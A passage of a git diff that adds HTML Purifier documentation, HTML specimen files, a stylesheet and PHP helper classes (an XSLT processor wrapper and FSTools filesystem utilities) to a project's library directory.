5.2.1. Structure Module + * 5.3. Applet Module + * 5.5. Forms Modules + o 5.5.1. Basic Forms Module + o 5.5.2. Forms Module + * 5.10. Object Module + * 5.11. Frames Module + * 5.13. Iframe Module + * 5.14. Intrinsic Events Module + * 5.15. Metainformation Module + * 5.16. Scripting Module + * 5.17. Style Sheet Module + * 5.19. Link Module + * 5.20. Base Module + +We will not be using W3C's XML Schemas or DTDs directly due to the lack +of robust tools for handling them (the main problem is that all the +current parsers are usually PHP 5 only and solely-validating, not +correcting). + +This system may be generalized and ported over for CSS. + +== General Use-Case == + +The outwards API of HTMLDefinition has been largely preserved, not +only for backwards-compatibility but also by design. Instead, +HTMLDefinition can be retrieved "raw", in which it loads a structure +that closely resembles the modules of XHTML 1.1. This structure is very +dynamic, making it easy to make cascading changes to global content +sets or remove elements in bulk. + +However, once HTML Purifier needs the actual definition, it retrieves +a finalized version of HTMLDefinition. The finalized definition involves +processing the modules into a form that it is optimized for multiple +calls. This final version is immutable and, even if editable, would +be extremely hard to change. + +So, some code taking advantage of the XHTML modularization may look +like this: + +<?php + $config = HTMLPurifier_Config::createDefault(); + $def =& $config->getHTMLDefinition(true); // reference to raw + $def->addElement('marquee', 'Block', 'Flow', 'Common'); + $purifier = new HTMLPurifier($config); + $purifier->purify($html); // now the definition is finalized +?> + +== Inclusions == + +One of the nice features of HTMLDefinition is that piggy-backing off +of global attribute and content sets is extremely easy to do. + +=== Attributes === + +HTMLModule->elements[$element]->attr stores attribute information for the +specific attributes of $element. This is quite close to the final +API that HTML Purifier interfaces with, but there's an important +extra feature: attr may also contain a array with a member index zero. + +<?php + HTMLModule->elements[$element]->attr[0] = array('AttrSet'); +?> + +Rather than map the attribute key 0 to an array (which should be +an AttrDef), it defines a number of attribute collections that should +be merged into this elements attribute array. + +Furthermore, the value of an attribute key, attribute value pair need +not be a fully fledged AttrDef object. They can also be a string, which +signifies a AttrDef that is looked up from a centralized registry +AttrTypes. This allows more concise attribute definitions that look +more like W3C's declarations, as well as offering a centralized point +for modifying the behavior of one attribute type. And, of course, the +old method of manually instantiating an AttrDef still works. + +=== Attribute Collections === + +Attribute collections are stored and processed in the AttrCollections +object, which is responsible for performing the inclusions signified +by the 0 index. These attribute collections, too, are mutable, by +using HTMLModule->attr_collections. You may add new attributes +to a collection or define an entirely new collection for your module's +use. Inclusions can also be cumulative. + +Attribute collections allow us to get rid of so called "global attributes" +(which actually aren't so global). + +=== Content Models and ChildDef === + +An implementation of the above-mentioned attributes and attribute +collections was applied to the ChildDef system. HTML Purifier uses +a proprietary system called ChildDef for performance and flexibility +reasons, but this does not line up very well with W3C's notion of +regexps for defining the allowed children of an element. + +HTMLPurifier->elements[$element]->content_model and +HTMLPurifier->elements[$element]->content_model_type store information +about the final ChildDef that will be stored in +HTMLPurifier->elements[$element]->child (we use a different variable +because the two forms are sufficiently different). + +$content_model is an abstract, string representation of the internal +state of ChildDef, while $content_model_type is a string identifier +of which ChildDef subclass to instantiate. $content_model is processed +by substituting all content set identifiers (capitalized element names) +with their contents. It is then parsed and passed into the appropriate +ChildDef class, as defined by the ContentSets->getChildDef() or the +custom fallback HTMLModule->getChildDef() for custom child definitions +not in the core. + +You'll need to use these facilities if you plan on referencing a content +set like "Inline" or "Block", and using them is recommended even if you're +not due to their conciseness. + +A few notes on $content_model: it's structure can be as complicated +as you want, but the pipe symbol (|) is reserved for defining possible +choices, due to the content sets implementation. For example, a content +model that looks like: + +"Inline -> Block -> a" + +...when the Inline content set is defined as "span | b" and the Block +content set is defined as "div | blockquote", will expand into: + +"span | b -> div | blockquote -> a" + +The custom HTMLModule->getChildDef() function will need to be able to +then feed this information to ChildDef in a usable manner. + +=== Content Sets === + +Content sets can be altered using HTMLModule->content_sets, an associative +array of content set names to content set contents. If the content set +already exists, your values are appended on to it (great for, say, +registering the font tag as an inline element), otherwise it is +created. They are substituted into content_model. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/ref-proprietary-tags.txt b/lib/htmlpurifier/docs/ref-proprietary-tags.txt new file mode 100644 index 000000000..5849eb04d --- /dev/null +++ b/lib/htmlpurifier/docs/ref-proprietary-tags.txt @@ -0,0 +1,26 @@ + +Proprietary Tags + <nobr> and friends + +Here are some proprietary tags that W3C does not define but occasionally show +up in the wild. We have only included tags that would make sense in an +HTML Purifier context. + +<align>, block element that aligns (extremely rare) +<blackface>, inline that double-bolds text (extremely rare) +<comment>, hidden comment for IE and WebTV +<multicol cols=number gutter=pixels width=pixels>, multiple columns +<nobr>, no linebreaks +<spacer align=* type="vertical|horizontal|block">, whitespace in doc, + use width/height for block and size for vertical/horizontal (attributes) + (extremely rare) +<wbr>, potential word break point: allows linebreaks. Only works in <nobr> + +<listing>, monospace pre-variant (extremely rare) +<plaintext>, escapes all tags to the end of document +<xmp>, monospace, replace with pre + +These should be put into their own Tidy module, not loaded by default(?). These +all qualify as "lenient" transforms. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/ref-whatwg.txt b/lib/htmlpurifier/docs/ref-whatwg.txt new file mode 100644 index 000000000..4bb4984f2 --- /dev/null +++ b/lib/htmlpurifier/docs/ref-whatwg.txt @@ -0,0 +1,26 @@ + +Web Hypertext Application Technology Working Group + WHATWG + +== HTML 5 == + +URL: http://www.whatwg.org/specs/web-apps/current-work/ + +HTML 5 defines a kaboodle of new elements and attributes, as well as +some well-defined, "quirks mode" HTML parsing. Although WHATWG professes +to be targeted towards web applications, many of their semantic additions +would be quite useful in regular documents. Eventually, HTML +Purifier will need to audit their lists and figure out what changes need +to be made. This process is complicated by the fact that the WHATWG +doesn't buy into W3C's modularization of XHTML 1.1: we may need +to remodularize HTML 5 (probably done by section name). No sense in +committing ourselves till the spec stabilizes, though. + +More immediately speaking though, however, is the well-defined parsing +behavior that HTML 5 adds. While I have little interest in writing +another DirectLex parser, other parsers like ph5p +<http://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more +flexible HTML parsing (a cool feature I've seen is how they resolve +<b>bold<i>both</b>italic</i>). + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/specimens/LICENSE b/lib/htmlpurifier/docs/specimens/LICENSE new file mode 100644 index 000000000..0bfad771e --- /dev/null +++ b/lib/htmlpurifier/docs/specimens/LICENSE @@ -0,0 +1,10 @@ +Licensing of Specimens + +Some files in this directory have different licenses: + +windows-live-mail-desktop-beta.html - donated by laacz, public domain +img.png - LGPL, from <http://commons.wikimedia.org/wiki/Image:Pastille_chrome.png> + +All other files are by me, and are licensed under LGPL. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/specimens/html-align-to-css.html b/lib/htmlpurifier/docs/specimens/html-align-to-css.html new file mode 100644 index 000000000..0adf76aaa --- /dev/null +++ b/lib/htmlpurifier/docs/specimens/html-align-to-css.html @@ -0,0 +1,165 @@ +<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" + "http://www.w3.org/TR/html4/loose.dtd"> +<html> +<head> +<title>HTML align attribute to CSS - HTML Purifier Specimen</title> +<style type="text/css"> +div.container {position:relative;height:110px;} +div.container.legend .test {text-align:center;line-height:100px;} +div.test {width:100px;height:100px;border:1px solid black; +position:absolute;top:10px;} +div.test.html {left:10px;} +div.test.css {left:140px;} +table {background:#F00;} +img {border:1px solid #000;} +hr {width:50px;} +div.segment {width:250px; float:left; margin-top:1em;} +</style> +</head> +<body> + +<h1>HTML align attribute to CSS</h1> + +<p>Inspect source for methodology.</p> + +<div class="container legend"> +<div class="test html"> + HTML +</div> +<div class="test css"> + CSS +</div> +</div> + +<div class="segment"> + +<h2>table.align</h2> + +<h3>left</h3> +<div class="container"> +<div class="test html"> + a<table align="left"><tr><td>O</td></tr></table>a +</div> +<div class="test css"> + a<table style="float:left;"><tr><td>O</td></tr></table>a +</div> +</div> + +<h3>center</h3> +<div class="container"> +<div class="test html"> + a<table align="center"><tr><td>O</td></tr></table>a +</div> +<div class="test css"> + a<table style="margin-left:auto; margin-right:auto;"><tr><td>O</td></tr></table>a +</div> +</div> + +<h3>right</h3> +<div class="container"> +<div class="test html"> + a<table align="right"><tr><td>O</td></tr></table>a +</div> +<div class="test css"> + a<table style="float:right;"><tr><td>O</td></tr></table>a +</div> +</div> + +</div> + +<!-- ################################################################## --> + +<div class="segment"> +<h2>img.align</h2> +<h3>left</h3> +<div class="container"> +<div class="test html"> + a<img src="img.png" align="left">a +</div> +<div class="test css"> + a<img src="img.png" style="float:left;">a +</div> +</div> + +<h3>right</h3> +<div class="container"> +<div class="test html"> + a<img src="img.png" align="right">a +</div> +<div class="test css"> + a<img src="img.png" style="float:right;">a +</div> +</div> + +<h3>bottom</h3> +<div class="container"> +<div class="test html"> + a<img src="img.png" align="bottom">a +</div> +<div class="test css"> + a<img src="img.png" style="vertical-align:baseline;">a +</div> +</div> + +<h3>middle</h3> +<div class="container"> +<div class="test html"> + a<img src="img.png" align="middle">a +</div> +<div class="test css"> + a<img src="img.png" style="vertical-align:middle;">a +</div> +</div> + +<h3>top</h3> +<div class="container"> +<div class="test html"> + a<img src="img.png" align="top">a +</div> +<div class="test css"> + a<img src="img.png" style="vertical-align:top;">a +</div> +</div> + +</div> + +<!-- ################################################################## --> + +<div class="segment"> + +<h2>hr.align</h2> + +<h3>left</h3> +<div class="container"> +<div class="test html"> + <hr align="left" /> +</div> +<div class="test css"> + <hr style="margin-right:auto; margin-left:0; text-align:left;" /> +</div> +</div> + +<h3>center</h3> +<div class="container"> +<div class="test html"> + <hr align="center" /> +</div> +<div class="test css"> + <hr style="margin-right:auto; margin-left:auto; text-align:center;" /> +</div> +</div> + +<h3>right</h3> +<div class="container"> +<div class="test html"> + <hr align="right" /> +</div> +<div class="test css"> + <hr style="margin-right:0; margin-left:auto; text-align:right;" /> +</div> +</div> + +</div> + +</body> +</html> diff --git a/lib/htmlpurifier/docs/specimens/img.png b/lib/htmlpurifier/docs/specimens/img.png Binary files differnew file mode 100644 index 000000000..a755bcb5e --- /dev/null +++ b/lib/htmlpurifier/docs/specimens/img.png diff --git a/lib/htmlpurifier/docs/specimens/jochem-blok-word.html b/lib/htmlpurifier/docs/specimens/jochem-blok-word.html new file mode 100644 index 000000000..1cc08f888 --- /dev/null +++ b/lib/htmlpurifier/docs/specimens/jochem-blok-word.html @@ -0,0 +1,129 @@ +<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"> + +<head> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii"> +<meta name=Generator content="Microsoft Word 12 (filtered medium)"> +<!--[if !mso]> +<style> +v\:* {behavior:url(#default#VML);} +o\:* {behavior:url(#default#VML);} +w\:* {behavior:url(#default#VML);} +..shape {behavior:url(#default#VML);} +</style> +<![endif]--> +<style> +<!-- + /* Font Definitions */ + @font-face + {font-family:"Cambria Math"; + panose-1:2 4 5 3 5 4 6 3 2 4;} +@font-face + {font-family:Calibri; + panose-1:2 15 5 2 2 2 4 3 2 4;} +@font-face + {font-family:Tahoma; + panose-1:2 11 6 4 3 5 4 4 2 4;} +@font-face + {font-family:Verdana; + panose-1:2 11 6 4 3 5 4 4 2 4;} + /* Style Definitions */ + p.MsoNormal, li.MsoNormal, div.MsoNormal + {margin:0cm; + margin-bottom:.0001pt; + font-size:10.0pt; + font-family:"Verdana","sans-serif";} +a:link, span.MsoHyperlink + {mso-style-priority:99; + color:blue; + text-decoration:underline;} +a:visited, span.MsoHyperlinkFollowed + {mso-style-priority:99; + color:purple; + text-decoration:underline;} +p.MsoAcetate, li.MsoAcetate, div.MsoAcetate + {mso-style-priority:99; + mso-style-link:"Balloon Text Char"; + margin:0cm; + margin-bottom:.0001pt; + font-size:8.0pt; + font-family:"Tahoma","sans-serif";} +span.EmailStyle17 + {mso-style-type:personal-compose; + font-family:"Verdana","sans-serif"; + color:windowtext;} +span.BalloonTextChar + {mso-style-name:"Balloon Text Char"; + mso-style-priority:99; + mso-style-link:"Balloon Text"; + font-family:"Tahoma","sans-serif";} +..MsoChpDefault + {mso-style-type:export-only;} +@page Section1 + {size:612.0pt 792.0pt; + margin:70.85pt 70.85pt 70.85pt 70.85pt;} +div.Section1 + {page:Section1;} +--> +</style> +<!--[if gte mso 9]><xml> + <o:shapedefaults v:ext="edit" spidmax="2050" /> +</xml><![endif]--><!--[if gte mso 9]><xml> + <o:shapelayout v:ext="edit"> + <o:idmap v:ext="edit" data="1" /> + </o:shapelayout></xml><![endif]--> +</head> + +<body lang=NL link=blue vlink=purple> + +<div class=Section1> + +<p class=MsoNormal><img width=1277 height=994 id="Picture_x0020_1" +src="cid:image001.png@01C8CBDF.5D1BAEE0"><o:p></o:p></p> + +<p class=MsoNormal><o:p> </o:p></p> + +<p class=MsoNormal><b>Name<o:p></o:p></b></p> + +<p class=MsoNormal>E-mail : <a href="mailto:mail@example.com"><span +style='color:windowtext'>mail@example.com</span></a><o:p></o:p></p> + +<p class=MsoNormal><o:p> </o:p></p> + +<p class=MsoNormal><b>Company<o:p></o:p></b></p> + +<p class=MsoNormal>Address 1<o:p></o:p></p> + +<p class=MsoNormal>Address 2<o:p></o:p></p> + +<p class=MsoNormal><o:p> </o:p></p> + +<p class=MsoNormal>Telefoon : +xx xx xxx xxx xx <span style='color:black'><o:p></o:p></span></p> + +<p class=MsoNormal><span lang=EN-US style='color:black'>Fax : +xx xx xxx xx xx<o:p></o:p></span></p> + +<p class=MsoNormal><span lang=EN-US style='color:black'>Internet : </span><span +style='color:black'><a href="http://www.example.com/"><span lang=EN-US +style='color:black'>http://www.example.com</span></a></span><span +lang=EN-US style='color:black'><o:p></o:p></span></p> + +<p class=MsoNormal><span lang=EN-US style='color:black'>Kamer van koophandel +xxxxxxxxx<o:p></o:p></span></p> + +<p class=MsoNormal><span lang=EN-US style='color:black'><o:p> </o:p></span></p> + +<p class=MsoNormal><span lang=EN-US style='font-size:7.5pt;color:black'>Op deze +e-mail is een disclaimer van toepassing, ga naar </span><span lang=EN-US +style='font-size:7.5pt'><a +href="http://www.example.com/disclaimer"><span +style='color:black'>www.example.com/disclaimer</span></a><br> +<span style='color:black'>A disclaimer is applicable to this email, please +refer to </span><a href="http://www.example.com/disclaimer"><span +style='color:black'>www.example.com/disclaimer</span></a><o:p></o:p></span></p> + +<p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p> + +</div> + +</body> + +</html> diff --git a/lib/htmlpurifier/docs/specimens/windows-live-mail-desktop-beta.html b/lib/htmlpurifier/docs/specimens/windows-live-mail-desktop-beta.html new file mode 100644 index 000000000..735b4bd95 --- /dev/null +++ b/lib/htmlpurifier/docs/specimens/windows-live-mail-desktop-beta.html @@ -0,0 +1,74 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> +<HTML ChildAreas="4" xmlns:canvas><HEAD> +<META http-equiv=Content-Type content=text/html;charset=windows-1257> +<STYLE></STYLE> + +<META content="MSHTML 6.00.6000.16414" name=GENERATOR></HEAD> +<BODY id=MailContainerBody +style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; FONT-SIZE: 10pt; COLOR: #000000; PADDING-TOP: 15px; FONT-FAMILY: Arial" +bgColor=#ff6600 leftMargin=0 background="" topMargin=0 +name="Compose message area" acc_role="text" CanvasTabStop="false"> +<DIV +style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; WIDTH: 100%; MARGIN-RIGHT: 10px; PADDING-TOP: 5px; BORDER-BOTTOM: #dddddd 1px solid; FONT-FAMILY: Verdana; HEIGHT: 25px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN +title="View a slideshow of the pictures in this e-mail message." +style="PADDING-RIGHT: 20px"><A style="COLOR: #0088e4" +href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216">Play +slideshow </A></SPAN><SPAN style="COLOR: #909090"><SPAN>|</SPAN><SPAN +style="PADDING-LEFT: 20px"> Download the highest quality version of a picture by +clicking the + above it </SPAN></SPAN></NOBR></DIV> +<DIV +style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%; PADDING-TOP: 2px"> +<OL> + <LI><IMG title="Angry smile emoticon" + style="FLOAT: none; MARGIN: 0px; POSITION: static" tabIndex=-1 + alt="Angry smile emoticon" src="cid:49F0C856199E4D688D2D740680733D74@wc" + MSNNonUserImageOrEmoticon="true">Un ka <FONT style="BACKGROUND-COLOR: #800000" + color=#cc99ff><STRONG>Tev</STRONG></FONT> iet, un ko tu dari? + <LI>Aha!</LI></OL> + +<UL> + <LI>Buletets + <LI> + <DIV align=justify><A title=http://laacz.lv/blog/ + href="http://laacz.lv/blog/">http://laacz.lv/blog/</A> un <A + title=http://google.com/ href="http://google.com/">gugle</A></DIV> + <LI>Sarakstucitis</LI></UL></DIV><SPAN><SPAN xmlns:canvas="canvas-namespace-id" +layoutEmptyTextWellFont="Tahoma"><SPAN +style="MARGIN-BOTTOM: 15px; OVERFLOW: visible; HEIGHT: 16px"></SPAN><SPAN +style="MARGIN-BOTTOM: 25px; VERTICAL-ALIGN: top; OVERFLOW: visible; MARGIN-RIGHT: 25px; HEIGHT: 234px"> +<TABLE style="DISPLAY: inline"> + <TBODY> + <TR> + + <TD> + <DIV + style="FONT-WEIGHT: bold; FONT-SIZE: 12pt; FONT-FAMILY: arial; TEXT-ALIGN: center"><A + id=HiresARef + title="Click here to view or download a high resolution version of this picture" + style="COLOR: #0088e4; TEXT-DECORATION: none" + href="http://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV> + <DIV + title="Click here to view the full image using the online photo viewer." + style="DISPLAY: inline; OVERFLOW: hidden; WIDTH: 140px; HEIGHT: 140px"><A + href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216" + border="0"><IMG + style="MARGIN-TOP: 15px; DISPLAY: inline-block; MARGIN-LEFT: 0px" + height=109 src="cid:006A71303B80404E9FB6184E55D6A446@wc" width=140 + border=0></A></DIV></TD></TR> + <TR> + <TD> + <DIV + style="FONT-SIZE: 10pt; WIDTH: 140px; FONT-FAMILY: verdana; TEXT-ALIGN: center"><EM><STRONG>This + <U>is </U></STRONG><U>tit</U>le</EM> fo<STRONG>r <FONT + face="Arial Black">t<FONT color=#800000 size=7>h<U>i</U></FONT>s + </FONT>picture</STRONG></DIV></TD></TR></TBODY></TABLE></SPAN></SPAN></SPAN> + +<DIV +style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%; PADDING-TOP: 2px; HEIGHT: 50px"> +<DIV> </DIV></DIV> +<DIV +style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; MARGIN-BOTTOM: 10px; WIDTH: 100%; COLOR: #909090; MARGIN-RIGHT: 10px; PADDING-TOP: 9px; FONT-FAMILY: Verdana; HEIGHT: 42px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN +title="Join Windows Live to share photos using Windows Live Photo E-mail.">Online +pictures are available for 30 days. <A style="COLOR: #0088e4" +href="http://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create +your own photo e-mails. </A></SPAN></NOBR></DIV></BODY></HTML> diff --git a/lib/htmlpurifier/docs/style.css b/lib/htmlpurifier/docs/style.css new file mode 100644 index 000000000..bd79c8a00 --- /dev/null +++ b/lib/htmlpurifier/docs/style.css @@ -0,0 +1,76 @@ +html {font-size:1em; font-family:serif; } +body {margin-left:4em; margin-right:4em; } + +dt {font-weight:bold; } +pre {margin-left:2em; } +pre, code, tt {font-family:monospace; font-size:1em; } + +h1 {text-align:center; font-family:Garamond, serif; + font-variant:small-caps;} +h2 {border-bottom:1px solid #CCC; font-family:sans-serif; font-weight:normal; + font-size:1.3em;} +h3 {font-family:sans-serif; font-size:1.1em; font-weight:bold; } +h4 {font-family:sans-serif; font-size:0.9em; font-weight:bold; } + +/* For witty quips */ +.subtitled {margin-bottom:0em;} +.subtitle , .subsubtitle {font-size:.8em; margin-bottom:1em; + font-style:italic; margin-top:-.2em;text-align:center;} +.subsubtitle {text-align:left;margin-left:2em;} + +/* Used for special "See also" links. */ +.reference {font-style:italic;margin-left:2em;} + +/* Marks off asides, discussions on why something is the way it is */ +.aside {margin-left:2em; font-family:sans-serif; font-size:0.9em; } +blockquote .label {font-weight:bold; font-size:1em; margin:0 0 .1em; + border-bottom:1px solid #CCC;} +.emphasis {font-weight:bold; text-align:center; font-size:1.3em;} + +/* A regular table */ +.table {border-collapse:collapse; border-bottom:2px solid #888; margin-left:2em; } +.table thead th {margin:0; background:#888; color:#FFF; } +.table thead th:first-child {-moz-border-radius-topleft:1em;} +.table tbody td {border-bottom:1px solid #CCC; padding-right:0.6em;padding-left:0.6em;} + +/* A quick table*/ +table.quick tbody th {text-align:right; padding-right:1em;} + +/* Category of the file */ +#filing {font-weight:bold; font-size:smaller; } + +/* Contains, without exception, Return to index. */ +#index {font-size:smaller; } + +#home {font-size:smaller;} + +/* Contains, without exception, $Id$, for SVN version info. */ +#version {text-align:right; font-style:italic; margin:2em 0;} + +#toc ol ol {list-style-type:lower-roman;} +#toc ol {list-style-type:decimal;} +#toc {list-style-type:upper-alpha;} + +q { + behavior: url(fixquotes.htc); /* IE fix */ + quotes: '\201C' '\201D' '\2018' '\2019'; +} +q:before { + content: open-quote; +} +q:after { + content: close-quote; +} + +/* Marks off implementation details interesting only to the person writing + the class described in the spec. */ +.technical {margin-left:2em; } +.technical:before {content:"Technical note: "; font-weight:bold; color:#061; } + +/* Marks off sections that are lacking. */ +.fixme {margin-left:2em; } +.fixme:before {content:"Fix me: "; font-weight:bold; color:#C00; } + +#applicability {margin: 1em 5%; font-style:italic;} + +/* vim: et sw=4 sts=4 */ diff --git a/lib/htmlpurifier/extras/ConfigDoc/HTMLXSLTProcessor.php b/lib/htmlpurifier/extras/ConfigDoc/HTMLXSLTProcessor.php new file mode 100644 index 000000000..f7095285b --- /dev/null +++ b/lib/htmlpurifier/extras/ConfigDoc/HTMLXSLTProcessor.php @@ -0,0 +1,86 @@ +<?php + +/** + * Decorator/extender XSLT processor specifically for HTML documents. + */ +class ConfigDoc_HTMLXSLTProcessor +{ + + /** + * Instance of XSLTProcessor + */ + protected $xsltProcessor; + + public function __construct($proc = false) { + if ($proc === false) $proc = new XSLTProcessor(); + $this->xsltProcessor = $proc; + } + + /** + * @note Allows a string $xsl filename to be passed + */ + public function importStylesheet($xsl) { + if (is_string($xsl)) { + $xsl_file = $xsl; + $xsl = new DOMDocument(); + $xsl->load($xsl_file); + } + return $this->xsltProcessor->importStylesheet($xsl); + } + + /** + * Transforms an XML file into compatible XHTML based on the stylesheet + * @param $xml XML DOM tree, or string filename + * @return string HTML output + * @todo Rename to transformToXHTML, as transformToHTML is misleading + */ + public function transformToHTML($xml) { + if (is_string($xml)) { + $dom = new DOMDocument(); + $dom->load($xml); + } else { + $dom = $xml; + } + $out = $this->xsltProcessor->transformToXML($dom); + + // fudges for HTML backwards compatibility + // assumes that document is XHTML + $out = str_replace('/>', ' />', $out); // <br /> not <br/> + $out = str_replace(' xmlns=""', '', $out); // rm unnecessary xmlns + + if (class_exists('Tidy')) { + // cleanup output + $config = array( + 'indent' => true, + 'output-xhtml' => true, + 'wrap' => 80 + ); + $tidy = new Tidy; + $tidy->parseString($out, $config, 'utf8'); + $tidy->cleanRepair(); + $out = (string) $tidy; + } + + return $out; + } + + /** + * Bulk sets parameters for the XSL stylesheet + * @param array $options Associative array of options to set + */ + public function setParameters($options) { + foreach ($options as $name => $value) { + $this->xsltProcessor->setParameter('', $name, $value); + } + } + + /** + * Forward any other calls to the XSLT processor + */ + public function __call($name, $arguments) { + call_user_func_array(array($this->xsltProcessor, $name), $arguments); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/FSTools.php b/lib/htmlpurifier/extras/FSTools.php new file mode 100644 index 000000000..17c35ee6d --- /dev/null +++ b/lib/htmlpurifier/extras/FSTools.php @@ -0,0 +1,157 @@ +<?php + +/** + * Filesystem tools not provided by default; can recursively create, copy + * and delete folders. Some template methods are provided for extensibility. + * + * @note This class must be instantiated to be used, although it does + * not maintain state. + */ +class FSTools +{ + + private static $singleton; + + /** + * Returns a global instance of FSTools + */ + static public function singleton() { + if (empty(FSTools::$singleton)) FSTools::$singleton = new FSTools(); + return FSTools::$singleton; + } + + /** + * Sets our global singleton to something else; useful for overloading + * functions. + */ + static public function setSingleton($singleton) { + FSTools::$singleton = $singleton; + } + + /** + * Recursively creates a directory + * @param string $folder Name of folder to create + * @note Adapted from the PHP manual comment 76612 + */ + public function mkdirr($folder) { + $folders = preg_split("#[\\\\/]#", $folder); + $base = ''; + for($i = 0, $c = count($folders); $i < $c; $i++) { + if(empty($folders[$i])) { + if (!$i) { + // special case for root level + $base .= DIRECTORY_SEPARATOR; + } + continue; + } + $base .= $folders[$i]; + if(!is_dir($base)){ + $this->mkdir($base); + } + $base .= DIRECTORY_SEPARATOR; + } + } + + /** + * Copy a file, or recursively copy a folder and its contents; modified + * so that copied files, if PHP, have includes removed + * @note Adapted from http://aidanlister.com/repos/v/function.copyr.php + */ + public function copyr($source, $dest) { + // Simple copy for a file + if (is_file($source)) { + return $this->copy($source, $dest); + } + // Make destination directory + if (!is_dir($dest)) { + $this->mkdir($dest); + } + // Loop through the folder + $dir = $this->dir($source); + while ( false !== ($entry = $dir->read()) ) { + // Skip pointers + if ($entry == '.' || $entry == '..') { + continue; + } + if (!$this->copyable($entry)) { + continue; + } + // Deep copy directories + if ($dest !== "$source/$entry") { + $this->copyr("$source/$entry", "$dest/$entry"); + } + } + // Clean up + $dir->close(); + return true; + } + + /** + * Overloadable function that tests a filename for copyability. By + * default, everything should be copied; you can restrict things to + * ignore hidden files, unreadable files, etc. This function + * applies to copyr(). + */ + public function copyable($file) { + return true; + } + + /** + * Delete a file, or a folder and its contents + * @note Adapted from http://aidanlister.com/repos/v/function.rmdirr.php + */ + public function rmdirr($dirname) + { + // Sanity check + if (!$this->file_exists($dirname)) { + return false; + } + + // Simple delete for a file + if ($this->is_file($dirname) || $this->is_link($dirname)) { + return $this->unlink($dirname); + } + + // Loop through the folder + $dir = $this->dir($dirname); + while (false !== $entry = $dir->read()) { + // Skip pointers + if ($entry == '.' || $entry == '..') { + continue; + } + // Recurse + $this->rmdirr($dirname . DIRECTORY_SEPARATOR . $entry); + } + + // Clean up + $dir->close(); + return $this->rmdir($dirname); + } + + /** + * Recursively globs a directory. + */ + public function globr($dir, $pattern, $flags = NULL) { + $files = $this->glob("$dir/$pattern", $flags); + if ($files === false) $files = array(); + $sub_dirs = $this->glob("$dir/*", GLOB_ONLYDIR); + if ($sub_dirs === false) $sub_dirs = array(); + foreach ($sub_dirs as $sub_dir) { + $sub_files = $this->globr($sub_dir, $pattern, $flags); + $files = array_merge($files, $sub_files); + } + return $files; + } + + /** + * Allows for PHP functions to be called and be stubbed. + * @warning This function will not work for functions that need + * to pass references; manually define a stub function for those. + */ + public function __call($name, $args) { + return call_user_func_array($name, $args); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/FSTools/File.php b/lib/htmlpurifier/extras/FSTools/File.php new file mode 100644 index 000000000..1c76705d6 --- /dev/null +++ b/lib/htmlpurifier/extras/FSTools/File.php @@ -0,0 +1,126 @@ +<?php + +/** + * Represents a file in the filesystem + * + * @warning Be sure to distinguish between get() and write() versus + * read() and put(), the former operates on the entire file, while + * the latter operates on a handle. + */ +class FSTools_File +{ + + /** Filename of file this object represents */ + protected $name; + + /** Handle for the file */ + protected $handle = false; + + /** Instance of FSTools for interfacing with filesystem */ + protected $fs; + + /** + * Filename of file you wish to instantiate. + * @note This file need not exist + */ + public function __construct($name, $fs = false) { + $this->name = $name; + $this->fs = $fs ? $fs : FSTools::singleton(); + } + + /** Returns the filename of the file. */ + public function getName() {return $this->name;} + + /** Returns directory of the file without trailing slash */ + public function getDirectory() {return $this->fs->dirname($this->name);} + + /** + * Retrieves the contents of a file + * @todo Throw an exception if file doesn't exist + */ + public function get() { + return $this->fs->file_get_contents($this->name); + } + + /** Writes contents to a file, creates new file if necessary */ + public function write($contents) { + return $this->fs->file_put_contents($this->name, $contents); + } + + /** Deletes the file */ + public function delete() { + return $this->fs->unlink($this->name); + } + + /** Returns true if file exists and is a file. */ + public function exists() { + return $this->fs->is_file($this->name); + } + + /** Returns last file modification time */ + public function getMTime() { + return $this->fs->filemtime($this->name); + } + + /** + * Chmod a file + * @note We ignore errors because of some weird owner trickery due + * to SVN duality + */ + public function chmod($octal_code) { + return @$this->fs->chmod($this->name, $octal_code); + } + + /** Opens file's handle */ + public function open($mode) { + if ($this->handle) $this->close(); + $this->handle = $this->fs->fopen($this->name, $mode); + return true; + } + + /** Closes file's handle */ + public function close() { + if (!$this->handle) return false; + $status = $this->fs->fclose($this->handle); + $this->handle = false; + return $status; + } + + /** Retrieves a line from an open file, with optional max length $length */ + public function getLine($length = null) { + if (!$this->handle) $this->open('r'); + if ($length === null) return $this->fs->fgets($this->handle); + else return $this->fs->fgets($this->handle, $length); + } + + 